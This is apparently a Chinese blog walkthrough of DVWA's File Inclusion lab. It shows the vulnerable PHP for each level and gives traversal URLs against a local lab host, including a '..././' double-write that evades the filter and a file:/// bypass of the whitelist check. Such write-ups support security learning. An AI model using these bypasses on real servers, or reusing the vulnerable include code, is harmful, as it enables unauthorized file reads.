新手DVWA-File Inclusion

阿新 • • 發佈：2020-07-23

File Inclusion

File Inclusion即檔案包含，是指使用了包含函式時，由於對引數過濾不當，導致使用者讀取和執行了意料之外的內容和命令

low

伺服器核心程式碼

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

?>

無任何過濾

解法

沒過濾的，直接包含：http://192.168.37.141:89/vulnerabilities/fi/?page=../../phpinfo.php

medium

伺服器核心程式碼

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );

?>

程式碼上存在黑名單過濾

解法

雙寫繞過：http://192.168.37.141:89/vulnerabilities/fi/?page=..././..././phpinfo.php

high

伺服器核心程式碼

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

白名單，要求檔案只能是file開頭或者include.php

解法

這裡可以使用file協議，繼續構造：http://192.168.37.141:89/vulnerabilities/fi/?page=file:///C:\inetpub\target\DVWA\phpinfo.php

impossible

伺服器核心程式碼

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

白名單限定了引數範圍，無法進行任意檔案包含了

新手DVWA-File Inclusion

File Inclusion File Inclusion即檔案包含，是指使用了包含函式時，由於對引數過濾不當，導致使用者讀取和執行了意料之外的內容和命令

新手DVWA-File Upload

File Upload File Upload即檔案上傳，是指在由於沒有對上傳檔案進行有效過濾的情況下，使使用者上傳非法檔案獲得伺服器許可權

DVWA靶場——File Inclusion(檔案包含)

概述在 Web 後臺開發中，程式設計師往往為了提高效率以及讓程式碼看起來更加簡潔，會使用 “包含” 函式功能。比如把一系列功能函式都寫進 function.php 中，之後當某個檔案需要呼叫的時候直接在檔案頭中寫上一句 &

DVWA 通關指南：File Inclusion(檔案包含)

目錄File Inclusion(檔案包含)Low Level原始碼審計攻擊方式Medium Level原始碼審計攻擊方式High Level原始碼審計攻擊方式Impossible Level總結參考資料

DVWA之File Inclusion

技術標籤：DVWAshell 學習基礎檔案上傳 low level 檢視原始碼： <?php // The page we wish to display

新手DVWA-CSRF

CSRF CSRF (Cross Site Request Forgery)即跨站請求偽造，是一種挾制使用者在當前已登入的Web應用程式上執行非本意的操作的攻擊方法

新手DVWA-SQL Injection (Blind)

SQL Injection (Blind) SQL Injection (Blind)即SQL盲注，同樣是由於web應用程式對使用者輸入資料沒有進行過濾或過濾不完全，導致輸入資料破壞原有SQL語句並執行惡意指令，與SQL注入區別在於SQL盲注沒有回顯，無法直

新手DVWA-XSS (Stored)

XSS (Stored) XSS(Cross Site Scripting)即跨站指令碼攻擊，是指由於過濾不當導致惡意程式碼注入網頁，當受害者訪問網頁時，瀏覽器執行惡意程式碼，執行攻擊者的攻擊行為

新手DVWA-XSS (Reflected)

XSS (Reflected) XSS(Cross Site Scripting)即跨站指令碼攻擊，是指由於過濾不當導致惡意程式碼注入網頁，當受害者訪問網頁時，瀏覽器執行惡意程式碼，執行攻擊者的攻擊行為

File Inclusion - Pikachu

概述：檔案包含，是一個功能。在各種開發語言中都提供了內建的檔案包含函式，其可以使開發人員在一個程式碼檔案中直接包含（引入）另外一個程式碼檔案。

DVWA—File Upload 檔案上傳

Low 原始碼： <?php if( isset( $_POST[ \'Upload\' ] ) ) { // Where are we going to be writing to? $target_path= DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";